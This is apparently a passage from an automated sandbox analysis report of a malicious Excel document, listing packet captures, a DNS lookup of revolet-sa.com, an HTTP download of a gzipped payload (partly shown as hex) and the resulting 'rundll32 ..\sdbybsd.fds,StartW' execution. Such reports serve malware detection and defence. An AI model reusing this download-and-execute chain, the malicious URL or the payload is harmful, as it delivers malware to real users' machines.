                                Apr 7, 2021 05:54:08.045866966 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.045870066 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.045893908 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.045927048 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.045964003 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.045980930 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.045998096 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.046015978 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.046041012 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.046063900 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.046128988 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.046145916 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.046161890 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.046179056 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.046183109 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.046219110 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.048851013 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.206753016 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.206813097 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.206845999 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.206876993 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.207096100 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.208825111 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.208884001 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.208992004 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.209228992 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.209273100 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.209276915 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.209287882 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.209312916 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.209328890 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.209352970 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.209372044 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.209403038 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.209481001 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.209527016 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.209546089 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.209574938 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.209577084 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.209619999 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.209634066 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.209660053 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.209666967 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.209713936 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.209717035 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.209757090 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.209773064 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.209796906 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.209813118 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.209836006 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.209850073 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.209877014 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.209889889 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.209914923 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.209930897 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.209964037 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.209969997 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.210005999 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.210026026 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.210046053 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.210057974 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.210087061 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.210103035 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.210128069 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22

                                UDP Packets

                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Apr 7, 2021 05:54:07.238785028 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                                Apr 7, 2021 05:54:07.251486063 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22

                                DNS Queries

                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                Apr 7, 2021 05:54:07.238785028 CEST | 192.168.2.22 | 8.8.8.8 | 0x1168 | Standard query (0) | revolet-sa.com | A (IP address) | IN (0x0001)

                                DNS Answers

                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                Apr 7, 2021 05:54:07.251486063 CEST | 8.8.8.8 | 192.168.2.22 | 0x1168 | No error (0) | revolet-sa.com | (none) | 192.232.249.186 | A (IP address) | IN (0x0001)

                                HTTP Request Dependency Graph

                                • revolet-sa.com

                                HTTP Packets

                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                0 | 192.168.2.22 | 49167 | 192.232.249.186 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                Timestamp | kBytes transferred | Direction | Data
                                Apr 7, 2021 05:54:07.430265903 CEST | 0 | OUT | GET /files/countryyelow.php HTTP/1.1
                                Accept: */*
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: revolet-sa.com
                                Connection: Keep-Alive
                                Apr 7, 2021 05:54:07.883936882 CEST | 2 | IN | HTTP/1.1 200 OK
                                Date: Wed, 07 Apr 2021 03:54:07 GMT
                                Server: Apache
                                Content-Disposition: attachment; filename="ySiCz.fbx"
                                Upgrade: h2,h2c
                                Connection: Upgrade, Keep-Alive
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Keep-Alive: timeout=5, max=75
                                Transfer-Encoding: chunked
                                Content-Type: application/octet-stream
                                Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 72 7f 60 53 d5 dd f7 49 72 9b 5e da 94 dc 62 a3 55 aa d6 c7 b8 e1 40 45 83 0a 6f c1 55 ed 2d 6c 23 78 af 91 04 84 b6 fa 08 31 de b9 0d 35 17 70 52 2c 0b d5 de 1d e2 d8 86 cf dc 04 05 c5 4d 37 37 9d 43 ed 36 27 a1 ed 5a 3a 19 a2 22 14 01 ad 5a f5 60 a3 06 a9 50 34 70 de ef b9 37 c9 4d 42 da 3d ef df af 85 dc 7b ee f9 7e 3e df 1f 9f ef c7 7b e3 5a 64 43 08 71 f0 a3 14 a1 76 64 fc d5 a2 ff fc 37 0c bf b1 e7 fe 6d 2c da 32 e6 df e7 b5 5b 66 ff fb bc 1b 42 b7 dd 55 bd e4 ce 1f dd 7a e7 cd 3f a8 be e5 e6 1f fe f0 47 e1 ea ff 5e 5c 7d a7 fa c3 ea db 7e 58 5d 77 9d af fa 07 3f 5a b4 f8 e2 b2 b2 12 77 2a c7 c9 eb ba e7 fc ed e2 27 cf 4e ff e2 97 fe fd ec 47 53 e7 07 e1 d7 07 df 4f e9 df 4f 9d 7d db 25 4f 9e 3d ed b2 df 9e bd 09 be af bf f4 b1 b3 cf d3 df 8f 9f 3d 11 de d6 09 7f 3a fb ef fa f7 d3 c6 fb b6 5b 42 2c c7 48 bd 4b 22 42 b3 2d 76 f4 cb ef dd 7e 53 fa ae 1f 8d 3d af 14 ee 50 0b a8 51 6b d7 ef ae 9a 6a 41 48 80 c3 5a a6 10 9c 04 fd a9 eb 85 90 f9 46 bb 4a 0c 1c fc 59 91 01 35 be 85 cc 3d 7b d5 de 5c 84 7c fa 97 1d 71 16 a4 d7 79 52 c8 64 31 ff 6e 2a 41 8b 1a 8d ba 55 ff 8b 5d a4 ff 2a c6 d8 91 c0 8f 1c bf 38 bc 78 79 18 de 57 a8 9c d1 50 0b 97 e9 2f fd 57 0d d5 2f be 73 d1 cd e1 9b 11 fa e5 6b 46 0f 20 4e 5a 83 cc 5f 2d fc bf d8 80 a1 27 57 c3 63 49 91 61 1c f6 ce c5 c5 2e be cd 00 56 5e ca 6e ec 06 ee d9 02 b8 3b ef ba f3 16 96 4f 48 ed a0 1a de 89 53 70 b5 17 df b9 f8 f6 1f 01 f0 e2 c5 48 d7 0a 2d 81 b7 50 92 8f bb 66 64 25 be fe fb fa ef eb bf af ff be fe fb fa ef eb bf af ff be fe fb fa ef eb bf af ff fe ff fa 6b ff 4b 13 27 90 1b ab 2d 48 96 37 ad 59 59 24 44 16 c7 91 5f 13 13 8a 25 2a 26 1a 25 85 57 90 a6 26 c9 be a9 1c c2 5e 1e ee 24 72 d1 56 2b dc c5 5b 16 27 51 d4 9b 20 4f 6d b3 42 68 08 8b 7c e3 22 ad 8c 25 ed ed e0 10 0d bb 39 46 96 c9 df 80 1a e9 12 e0 6e 2e 8e cb 72 54 1c 96 14 bb 62 25 f7 b1 94 22 8f bd c3 1a 3c 92 da 2c 2e c3 83 b0 4c 7e 92 c3 8b 8a 49 49 29 55 6c e4 3a 9d 96 ec ed d4 91 70 23 93 79 85 90 1c b9 20 0f c9 c9 e4 e2 42 c8 22 f2 d5 95 b9 c8 22 99 70 85 90 76 f2 5a 1e d2 2e 93 b7 ae cc 45 9e 94 14 ab 52 4c 7e 07 d7 41 2c 9e ec ed 74 6e ad 73 73 fa a5 4c fe 58 08 cc 93 1f 9f 0a e6 65 d2 92 01 b7 f7 b2 35 fd e5 1c 58 93 5f 99 4e 7e c5 db 10 4e cc d7 d4 84 27 56 93 d0 c4 64 d8 89 77 92 77 7a ac a8 c7 3e 75 2d 27 e0 6e 58 48 66 1b 9d 50 ca 13 93 24 89 aa 55 54 ad a4 6a 05 55 05 aa 3a 42 09 80 92 f5 21 84 1a 3a aa 90 1f 1f 26 15 00 3f 5a e7 e6 2d e1 62 3f 59 00 45 e6 e3 ee 46 28 7f a8 e9 75 2b 6a af 06 78 67 4a 0d 05 31 3d ac 8a 45 26 37 58 6c 4c 92 48 57 a5 a1 4a a8 fa 8e 22 41 41 f0 8f 63 e1 cb 21 1c e9 aa 32 85 4c 53 61 c5 67 e6 53 dd 26 15 c2 5f a2 02 54 1b 50 61 e7 6f a3 3c ea 04 93 0a e1 ad 79 d4 93 8c 0a 35 99 09 1e 87 18 13 5b e7 1a 7a 87 26 99 6c 40 ac 1a 89 0d c6 58 5c 80 3d d9 64 03 e2 da 0c bb fd 08 5b 5b b2 0a d6 26 6f 5a b3 b2 48 88 2c 8e 23 bf 26 26 14 4b 54 4c 34 b2 ac 3c 64 b5 cb 9a 9a 24 0e 36 91 97 87 bc 10 93 48 cf df ad 48 53 e3 2d 8b 93 28 ea 4d 90 6b 5f b6 42 74 08 8b 7c 66 af 50 40 9f 7c 8a 59 1d
                                Data Ascii: 1faar`SIr^bU@EoU-l#x15pR,M77C6'Z:"Z`P4p7MB={~>{ZdCqvd7m,2[fBUz?G^\}~X]w?Zw*'NGSOO}%O==:[B,HK"B-v~S=PQkjAHZFJY5={\|qyRd1n*AU]*8xyWP/W/skF NZ_-'WcIa.V^n;OHSpH-Pfd%kK'-H7YY$D_%*&%W&^$rV+['Q OmBh|"%9Fn.rTb%"<,.L~II)Ul:p#y B""pvZ.ERL~A,tnssLXe5X_N~N'Vdwwz>u-'nXHfP$UTjU:B!:&?Z-b?YEF(u+jxgJ1=E&7XlLHWJ"AAc!2LSagS&_TPao<y5[z&l@X\=d[[&oZH,#&&KTL4<d$6HHS-(Mk_Bt|fP@|Y


                                Code Manipulations

                                Statistics

                                Behavior


                                System Behavior

                                General

                                Start time: 05:53:35
                                Start date: 07/04/2021
                                Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                Wow64 process (32bit): false
                                Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                Imagebase: 0x13f810000
                                File size: 27641504 bytes
                                MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
                                Has elevated privileges: true
                                Has administrator privileges: true
                                Programmed in: C, C++ or other language
                                Reputation: high

                                General

                                Start time: 05:53:40
                                Start date: 07/04/2021
                                Path: C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit): false
                                Commandline: rundll32 ..\sdbybsd.fds,StartW
                                Imagebase: 0xfff10000
                                File size: 45568 bytes
                                MD5 hash: DD81D91FF3B0763C392422865C9AC12E
                                Has elevated privileges: true
                                Has administrator privileges: true
                                Programmed in: C, C++ or other language
                                Reputation: high

                                General

                                Start time: 05:53:40
                                Start date: 07/04/2021
                                Path: C:\Windows\SysWOW64\rundll32.exe
                                Wow64 process (32bit): true
                                Commandline: rundll32 ..\sdbybsd.fds,StartW
                                Imagebase: 0x550000
                                File size: 44544 bytes
                                MD5 hash: 51138BEEA3E2C21EC44D0932C71762A8
                                Has elevated privileges: true
                                Has administrator privileges: true
                                Programmed in: C, C++ or other language
                                Reputation: high

                                General

                                Start time: 05:53:41
                                Start date: 07/04/2021
                                Path: C:\Windows\System32\wermgr.exe
                                Wow64 process (32bit):
                                Commandline: C:\Windows\system32\wermgr.exe
                                Imagebase:
                                File size: 50688 bytes
                                MD5 hash: 41DF7355A5A907E2C1D7804EC028965D
                                Has elevated privileges: true
                                Has administrator privileges: true
                                Programmed in: C, C++ or other language
                                Reputation: moderate

                                Disassembly

                                Code Analysis
